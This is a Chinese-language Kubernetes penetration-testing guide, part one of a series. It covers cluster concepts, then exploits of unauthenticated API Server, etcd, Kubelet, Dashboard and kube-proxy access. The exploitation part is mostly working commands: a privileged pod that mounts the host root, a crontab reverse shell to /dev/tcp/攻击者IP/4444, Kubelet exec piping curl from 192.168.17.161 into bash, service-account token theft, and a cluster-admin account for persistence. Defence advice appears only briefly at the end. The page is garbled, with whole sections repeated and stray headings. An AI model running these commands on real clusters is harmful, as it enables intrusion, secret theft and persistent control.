Kubernetes集群安全攻防指南（上）<\/h1>

一、Kubernetes基础概念<\/h2>

1. 容器(Container)<\/h3>

轻量级操作系统级虚拟化技术<\/li>
使用namespace隔离不同运行环境<\/li>
通过镜像自包含软件运行环境<\/li>

体积小、启动快，实现开发到生产环境的一致性<\/li> <\/ul>

2. Pod<\/h3>

Kubernetes管理的基本单位<\/li>
每个Pod可包含一个或多个紧密关联的容器<\/li>
共享PID、IPC、Network和UTS Namespace<\/li>

示例YAML定义：<\/li> <\/ul>

apiVersion<\/span>: v1<\/span>
<\/span><\/span>kind<\/span>: Pod<\/span>
<\/span><\/span>metadata<\/span>:
<\/span><\/span>  name<\/span>: nginx<\/span>
<\/span><\/span>  labels<\/span>:
<\/span><\/span>    app<\/span>: nginx<\/span>
<\/span><\/span>spec<\/span>:
<\/span><\/span>  containers<\/span>:
<\/span><\/span>  - name<\/span>: nginx<\/span>
<\/span><\/span>    image<\/span>: nginx<\/span>
<\/span><\/span>    ports<\/span>:
<\/span><\/span>    - containerPort<\/span>: 80<\/span>
<\/span><\/span><\/code><\/pre>3. Node<\/h3>

Pod实际运行的主机（物理机或虚拟机）<\/li>
每个Node至少运行：

Container Runtime（如docker\/rkt）<\/li>
Kubelet<\/li>
Kube-proxy服务<\/li>
<\/ul>
<\/li>
<\/ul>
4. Namespace<\/h3>

资源和对象的抽象集合<\/li>
用于划分不同项目组或用户组<\/li>
默认namespace为"default"<\/li>
<\/ul>
5. Service<\/h3>

应用服务的抽象<\/li>
通过labels提供负载均衡和服务发现<\/li>
示例YAML定义：<\/li>
<\/ul>
apiVersion<\/span>: v1<\/span>
<\/span><\/span>kind<\/span>: Service<\/span>
<\/span><\/span>metadata<\/span>:
<\/span><\/span>  name<\/span>: nginx<\/span>
<\/span><\/span>spec<\/span>:
<\/span><\/span>  ports<\/span>:
<\/span><\/span>  - port<\/span>: 8078<\/span>
<\/span><\/span>    name<\/span>: http<\/span>
<\/span><\/span>    targetPort<\/span>: 80<\/span>
<\/span><\/span>    protocol<\/span>: TCP<\/span>
<\/span><\/span>  selector<\/span>:
<\/span><\/span>    app<\/span>: nginx<\/span>
<\/span><\/span><\/code><\/pre>二、Kubernetes架构<\/h2>
1. 架构来源<\/h3>

源自Google的Borg系统<\/li>
核心组件：

BorgMaster：集群大脑<\/li>
Borglet：运行任务<\/li>
Borgcfg：命令行工具<\/li>
Scheduler：任务调度<\/li>
<\/ul>
<\/li>
<\/ul>
2. Kubernetes核心组件<\/h3>



组件<\/th>
功能描述<\/th>
<\/tr>
<\/thead>


etcd<\/td>
保存整个集群状态<\/td>
<\/tr>

apiserver<\/td>
资源操作唯一入口，提供认证授权等机制<\/td>
<\/tr>

controller manager<\/td>
维护集群状态（故障检测、自动扩展等）<\/td>
<\/tr>

scheduler<\/td>
资源调度，按策略分配Pod到机器<\/td>
<\/tr>

kubelet<\/td>
维护容器生命周期，管理Volume和网络<\/td>
<\/tr>

Container runtime<\/td>
镜像管理及Pod\/容器运行<\/td>
<\/tr>

kube-proxy<\/td>
为Service提供内部服务发现和负载均衡<\/td>
<\/tr>
<\/tbody>
<\/table>
3. 关键组件默认端口<\/h3>
（原文中未明确列出具体端口，需补充）<\/p>
三、渗透测试路径<\/h2>
1. 信息收集<\/h3>
环境检测<\/h4>
env | grep KUBERNETES
<\/span><\/span>ls -al \/  # 检查.dockerenv文件存在<\/span>
<\/span><\/span><\/code><\/pre>内核版本<\/h4>
kubectl get nodes -o jsonpath=<\/span>'{range .items[*]}{.metadata.name}{"\t"}{.status.nodeInfo.kernelVersion}{"\n"}{end}'<\/span>
<\/span><\/span><\/code><\/pre>2. Token利用<\/h3>
Service Account Token<\/h4>
cat \/var\/run\/secrets\/kubernetes.io\/serviceaccount\/token
<\/span><\/span><\/code><\/pre>Secrets泄露<\/h4>
.\/cdk run k8s-secret-dump auto
<\/span><\/span><\/code><\/pre>3. 安全策略检查<\/h3>
.\/cdk run k8s-psp-dump auto
<\/span><\/span><\/code><\/pre>4. 网络发现<\/h3>

Flannel默认网络：10.244.0.0\/16<\/li>
Calico默认网络：192.168.0.0\/16<\/li>
<\/ul>
四、常见漏洞利用<\/h2>
1. API Server未授权访问<\/h3>
检测方法<\/h4>
访问：<\/p>
http:\/\/ip:port\/
https:\/\/ip:6443\/
<\/code><\/pre>
利用方法<\/h4>

获取节点信息：<\/li>
<\/ol>
kubectl -s ip:port get nodes
<\/span><\/span><\/code><\/pre>
创建特权Pod（挂载宿主机根目录）：<\/li>
<\/ol>
apiVersion<\/span>: v1<\/span>
<\/span><\/span>kind<\/span>: Pod<\/span>
<\/span><\/span>metadata<\/span>:
<\/span><\/span>  name<\/span>: myapp<\/span>
<\/span><\/span>spec<\/span>:
<\/span><\/span>  containers<\/span>:
<\/span><\/span>  - image<\/span>: nginx<\/span>
<\/span><\/span>    name<\/span>: container<\/span>
<\/span><\/span>    volumeMounts<\/span>:
<\/span><\/span>    - mountPath<\/span>: \/mnt<\/span>
<\/span><\/span>      name<\/span>: test-volume<\/span>
<\/span><\/span>  volumes<\/span>:
<\/span><\/span>  - name<\/span>: test-volume<\/span>
<\/span><\/span>    hostPath<\/span>:
<\/span><\/span>      path<\/span>: \/<\/span>
<\/span><\/span><\/code><\/pre>
通过挂载目录写入计划任务反弹shell：<\/li>
<\/ol>
echo -e "* * * * * root bash -i >& \/dev\/tcp\/攻击者IP\/4444 0>&1\n"<\/span> >> \/mnt\/etc\/crontab
<\/span><\/span><\/code><\/pre>2. ETCD未授权访问<\/h3>
检测接口<\/h4>
https:\/\/IP:2379\/version
https:\/\/IP:2379\/v2\/keys
<\/code><\/pre>
利用方法<\/h4>

设置API版本：<\/li>
<\/ol>
export ETCDCTL_API=<\/span>3<\/span>
<\/span><\/span><\/code><\/pre>
查看集群Secret：<\/li>
<\/ol>
etcdctl get \/ --prefix --keys-only | grep \/secrets\/
<\/span><\/span><\/code><\/pre>
读取敏感信息：<\/li>
<\/ol>
etcdctl get \/registry\/secrets\/default\/acr-credential-518dfd1883737c2a6bde99ed6fee583c
<\/span><\/span><\/code><\/pre>3. Kubelet未授权访问<\/h3>
检测方法<\/h4>
访问：<\/p>
https:\/\/ip:10250\/pods
<\/code><\/pre>
利用方法<\/h4>

执行命令：<\/li>
<\/ol>
curl -k -XPOST "https:\/\/192.168.17.144:10250\/run\/kube-system\/kube-flannel-ds-xwk2t\/kube-flannel"<\/span> -d "cmd=ls -la \/"<\/span>
<\/span><\/span><\/code><\/pre>
获取Token：<\/li>
<\/ol>
curl -k -XPOST "https:\/\/192.168.17.144:10250\/run\/kube-system\/kube-flannel-ds-xwk2t\/kube-flannel"<\/span> -d "cmd=cat \/var\/run\/secrets\/kubernetes.io\/serviceaccount\/token"<\/span>
<\/span><\/span><\/code><\/pre>
反弹shell：<\/li>
<\/ol>
curl --insecure -v -H "X-Stream-Protocol-Version: v2.channel.k8s.io"<\/span> -H "X-Stream-Protocol-Version: channel.k8s.io"<\/span> -X POST "https:\/\/192.168.17.144:10250\/exec\/kube-system\/kube-flannel-ds-xwk2t\/kube-flannel?command=\/bin\/bash&command=-c&command=curl+192.168.17.161:80+|+bash&input=1&output=1&tty=1"<\/span>
<\/span><\/span><\/code><\/pre>4. Dashboard未授权访问<\/h3>
利用方法<\/h4>

通过Web UI创建特权Pod（同上API Server利用方法）<\/li>
挂载宿主机目录写入计划任务<\/li>
<\/ol>
5. kube-proxy配置错误<\/h3>
利用方法<\/h4>

启动代理：<\/li>
<\/ol>
kubectl proxy --port=<\/span>8080<\/span> --address=<\/span>192.168.17.144 --api-prefix=<\/span>\/ --disable-filter=<\/span>true
<\/span><\/span><\/code><\/pre>
通过代理访问API：<\/li>
<\/ol>
kubectl -s 192.168.17.144:8080 get nodes
<\/span><\/span><\/code><\/pre>五、权限提升与持久化<\/h2>
1. Dashboard权限配置<\/h3>

创建管理员用户：<\/li>
<\/ol>
kubectl create serviceaccount dashboard-admin -n kubernetes-dashboard
<\/span><\/span><\/code><\/pre>
绑定集群管理员角色：<\/li>
<\/ol>
kubectl create clusterrolebinding dashboard-cluster-admin --clusterrole=<\/span>cluster-admin --serviceaccount=<\/span>kubernetes-dashboard:dashboard-admin
<\/span><\/span><\/code><\/pre>
获取Token：<\/li>
<\/ol>
kubectl get sa,secrets -n kubernetes-dashboard
<\/span><\/span>kubectl describe secret -n kubernetes-dashboard dashboard-admin-token-kqsll
<\/span><\/span><\/code><\/pre>
生成kubeconfig文件：<\/li>
<\/ol>
DASH_TOCKEN=<\/span>$(<\/span>kubectl get secret -n kubernetes-dashboard dashboard-admin-token-kqsll -o jsonpath={<\/span>.data.token}<\/span> | base64 -d)<\/span>
<\/span><\/span>kubectl config set-cluster kubernetes --server=<\/span>192.168.17.144:30001 --kubeconfig=<\/span>\/home\/r00t\/dashbord-admin.conf
<\/span><\/span>kubectl config set-credentials dashboard-admin --token=<\/span>$DASH_TOCKEN --kubeconfig=<\/span>\/home\/r00t\/dashbord-admin.conf
<\/span><\/span>kubectl config set-context dashboard-admin@kubernetes --cluster=<\/span>kubernetes --user=<\/span>dashboard-admin --kubeconfig=<\/span>\/home\/r00t\/dashbord-admin.conf
<\/span><\/span>kubectl config use-context dashboard-admin@kubernetes --kubeconfig=<\/span>\/home\/r00t\/dashbord-admin.conf
<\/span><\/span><\/code><\/pre>六、防御建议<\/h2>

启用API Server认证授权<\/li>
限制ETCD访问（启用TLS和客户端证书认证）<\/li>
配置Kubelet认证<\/li>
关闭Dashboard的skip-login功能<\/li>
合理配置Pod Security Policies<\/li>
监控异常API请求和容器行为<\/li>
定期轮换Service Account Token<\/li>
<\/ol>
（注：下篇将包含容器逃逸、横向移动、权限维持等高级技巧）<\/p>

组件<\/th>	功能描述<\/th> <\/tr> <\/thead>
etcd<\/td>	保存整个集群状态<\/td> <\/tr>
apiserver<\/td>	资源操作唯一入口，提供认证授权等机制<\/td> <\/tr>
controller manager<\/td>	维护集群状态（故障检测、自动扩展等）<\/td> <\/tr>
scheduler<\/td>	资源调度，按策略分配Pod到机器<\/td> <\/tr>
kubelet<\/td>	维护容器生命周期，管理Volume和网络<\/td> <\/tr>
Container runtime<\/td>	镜像管理及Pod\/容器运行<\/td> <\/tr>
kube-proxy<\/td>	为Service提供内部服务发现和负载均衡<\/td> <\/tr> <\/tbody> <\/table> 3. 关键组件默认端口<\/h3> （原文中未明确列出具体端口，需补充）<\/p> 三、渗透测试路径<\/h2> 1. 信息收集<\/h3> 环境检测<\/h4> env \| grep KUBERNETES <\/span><\/span>ls -al \/ # 检查.dockerenv文件存在<\/span> <\/span><\/span><\/code><\/pre>内核版本<\/h4> kubectl get nodes -o jsonpath=<\/span>'{range .items[]}{.metadata.name}{"\t"}{.status.nodeInfo.kernelVersion}{"\n"}{end}'<\/span> <\/span><\/span><\/code><\/pre>2. Token利用<\/h3> Service Account Token<\/h4> cat \/var\/run\/secrets\/kubernetes.io\/serviceaccount\/token <\/span><\/span><\/code><\/pre>Secrets泄露<\/h4> .\/cdk run k8s-secret-dump auto <\/span><\/span><\/code><\/pre>3. 安全策略检查<\/h3> .\/cdk run k8s-psp-dump auto <\/span><\/span><\/code><\/pre>4. 网络发现<\/h3> Flannel默认网络：10.244.0.0\/16<\/li> Calico默认网络：192.168.0.0\/16<\/li> <\/ul> 四、常见漏洞利用<\/h2> 1. API Server未授权访问<\/h3> 检测方法<\/h4> 访问：<\/p> http:\/\/ip:port\/ https:\/\/ip:6443\/ <\/code><\/pre> 利用方法<\/h4> 获取节点信息：<\/li> <\/ol> kubectl -s ip:port get nodes <\/span><\/span><\/code><\/pre> 创建特权Pod（挂载宿主机根目录）：<\/li> <\/ol> apiVersion<\/span>: v1<\/span> <\/span><\/span>kind<\/span>: Pod<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: myapp<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> containers<\/span>: <\/span><\/span> - image<\/span>: nginx<\/span> <\/span><\/span> name<\/span>: container<\/span> <\/span><\/span> volumeMounts<\/span>: <\/span><\/span> - mountPath<\/span>: \/mnt<\/span> <\/span><\/span> name<\/span>: test-volume<\/span> <\/span><\/span> volumes<\/span>: <\/span><\/span> - name<\/span>: test-volume<\/span> <\/span><\/span> hostPath<\/span>: <\/span><\/span> path<\/span>: \/<\/span> <\/span><\/span><\/code><\/pre> 通过挂载目录写入计划任务反弹shell：<\/li> <\/ol> echo -e " * * * * root bash -i >& \/dev\/tcp\/攻击者IP\/4444 0>&1\n"<\/span> >> \/mnt\/etc\/crontab <\/span><\/span><\/code><\/pre>2. ETCD未授权访问<\/h3> 检测接口<\/h4> https:\/\/IP:2379\/version https:\/\/IP:2379\/v2\/keys <\/code><\/pre> 利用方法<\/h4> 设置API版本：<\/li> <\/ol> export ETCDCTL_API=<\/span>3<\/span> <\/span><\/span><\/code><\/pre> 查看集群Secret：<\/li> <\/ol> etcdctl get \/ --prefix --keys-only \| grep \/secrets\/ <\/span><\/span><\/code><\/pre> 读取敏感信息：<\/li> <\/ol> etcdctl get \/registry\/secrets\/default\/acr-credential-518dfd1883737c2a6bde99ed6fee583c <\/span><\/span><\/code><\/pre>3. Kubelet未授权访问<\/h3> 检测方法<\/h4> 访问：<\/p> https:\/\/ip:10250\/pods <\/code><\/pre> 利用方法<\/h4> 执行命令：<\/li> <\/ol> curl -k -XPOST "https:\/\/192.168.17.144:10250\/run\/kube-system\/kube-flannel-ds-xwk2t\/kube-flannel"<\/span> -d "cmd=ls -la \/"<\/span> <\/span><\/span><\/code><\/pre> 获取Token：<\/li> <\/ol> curl -k -XPOST "https:\/\/192.168.17.144:10250\/run\/kube-system\/kube-flannel-ds-xwk2t\/kube-flannel"<\/span> -d "cmd=cat \/var\/run\/secrets\/kubernetes.io\/serviceaccount\/token"<\/span> <\/span><\/span><\/code><\/pre> 反弹shell：<\/li> <\/ol> curl --insecure -v -H "X-Stream-Protocol-Version: v2.channel.k8s.io"<\/span> -H "X-Stream-Protocol-Version: channel.k8s.io"<\/span> -X POST "https:\/\/192.168.17.144:10250\/exec\/kube-system\/kube-flannel-ds-xwk2t\/kube-flannel?command=\/bin\/bash&command=-c&command=curl+192.168.17.161:80+\|+bash&input=1&output=1&tty=1"<\/span> <\/span><\/span><\/code><\/pre>4. Dashboard未授权访问<\/h3> 利用方法<\/h4> 通过Web UI创建特权Pod（同上API Server利用方法）<\/li> 挂载宿主机目录写入计划任务<\/li> <\/ol> 5. kube-proxy配置错误<\/h3> 利用方法<\/h4> 启动代理：<\/li> <\/ol> kubectl proxy --port=<\/span>8080<\/span> --address=<\/span>192.168.17.144 --api-prefix=<\/span>\/ --disable-filter=<\/span>true <\/span><\/span><\/code><\/pre> 通过代理访问API：<\/li> <\/ol> kubectl -s 192.168.17.144:8080 get nodes <\/span><\/span><\/code><\/pre>五、权限提升与持久化<\/h2> 1. Dashboard权限配置<\/h3> 创建管理员用户：<\/li> <\/ol> kubectl create serviceaccount dashboard-admin -n kubernetes-dashboard <\/span><\/span><\/code><\/pre> 绑定集群管理员角色：<\/li> <\/ol> kubectl create clusterrolebinding dashboard-cluster-admin --clusterrole=<\/span>cluster-admin --serviceaccount=<\/span>kubernetes-dashboard:dashboard-admin <\/span><\/span><\/code><\/pre> 获取Token：<\/li> <\/ol> kubectl get sa,secrets -n kubernetes-dashboard <\/span><\/span>kubectl describe secret -n kubernetes-dashboard dashboard-admin-token-kqsll <\/span><\/span><\/code><\/pre> 生成kubeconfig文件：<\/li> <\/ol> DASH_TOCKEN=<\/span>$(<\/span>kubectl get secret -n kubernetes-dashboard dashboard-admin-token-kqsll -o jsonpath={<\/span>.data.token}<\/span> \| base64 -d)<\/span> <\/span><\/span>kubectl config set-cluster kubernetes --server=<\/span>192.168.17.144:30001 --kubeconfig=<\/span>\/home\/r00t\/dashbord-admin.conf <\/span><\/span>kubectl config set-credentials dashboard-admin --token=<\/span>$DASH_TOCKEN --kubeconfig=<\/span>\/home\/r00t\/dashbord-admin.conf <\/span><\/span>kubectl config set-context dashboard-admin@kubernetes --cluster=<\/span>kubernetes --user=<\/span>dashboard-admin --kubeconfig=<\/span>\/home\/r00t\/dashbord-admin.conf <\/span><\/span>kubectl config use-context dashboard-admin@kubernetes --kubeconfig=<\/span>\/home\/r00t\/dashbord-admin.conf <\/span><\/span><\/code><\/pre>六、防御建议<\/h2> 启用API Server认证授权<\/li> 限制ETCD访问（启用TLS和客户端证书认证）<\/li> 配置Kubelet认证<\/li> 关闭Dashboard的skip-login功能<\/li> 合理配置Pod Security Policies<\/li> 监控异常API请求和容器行为<\/li> 定期轮换Service Account Token<\/li> <\/ol> （注：下篇将包含容器逃逸、横向移动、权限维持等高级技巧）<\/p>

Kubernetes集群安全攻防指南（上）<\/h1>

一、Kubernetes基础概念<\/h2>

二、Kubernetes架构<\/h2>

3. 关键组件默认端口<\/h3> （原文中未明确列出具体端口，需补充）<\/p>

三、渗透测试路径<\/h2>

1. 信息收集<\/h3>

2. Token利用<\/h3>

四、常见漏洞利用<\/h2>

1. API Server未授权访问<\/h3>

2. ETCD未授权访问<\/h3>

3. Kubelet未授权访问<\/h3>

4. Dashboard未授权访问<\/h3>

5. kube-proxy配置错误<\/h3>

五、权限提升与持久化<\/h2>

3. 关键组件默认端口<\/h3>
（原文中未明确列出具体端口，需补充）<\/p>